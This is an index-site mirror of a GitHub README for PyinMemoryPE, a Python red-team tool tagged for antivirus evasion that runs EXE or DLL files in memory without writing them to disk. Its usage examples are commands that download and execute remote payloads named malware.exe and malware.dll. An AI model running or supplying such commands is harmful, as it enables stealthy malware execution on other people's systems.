An open API service indexing awesome lists of open source software.

https://github.com/elmerikh/pyinmemorype

load PE in memory Filelessly
https://github.com/elmerikh/pyinmemorype

evade-av fileless-attack fileless-malware fileless-pe-injector pe-file-injector pe-injection pe-loader python-pe-injector redteam-tools redteaming-tools

Last synced: 9 months ago
JSON representation

load PE in memory Filelessly

Awesome Lists containing this project

README

          

Greetings
------------

# PyinMemoryPE
execute any PE (dll,exe) in memory filelessly

# usage

pyMemory.py < url> < TYPe >

# build into exe

use pyinstaller or nuitka and build pymemory.py

or use the prebuilt exe in ./output

# example

exe : PyexecMemory.exe http://example.com/malware.exe EXE

dll: PyexecMemory.exe http://example.com/malware.dll DLL --Method DLLRegisterServer

#video demo :(by gemini cyber security)

https://youtu.be/51dctDdCiI0?feature=shared

# Check for more info and resources

https://github.com/naksyn/PythonMemoryModule

https://www.joachim-bauch.de/tutorials/loading-a-dll-from-memory/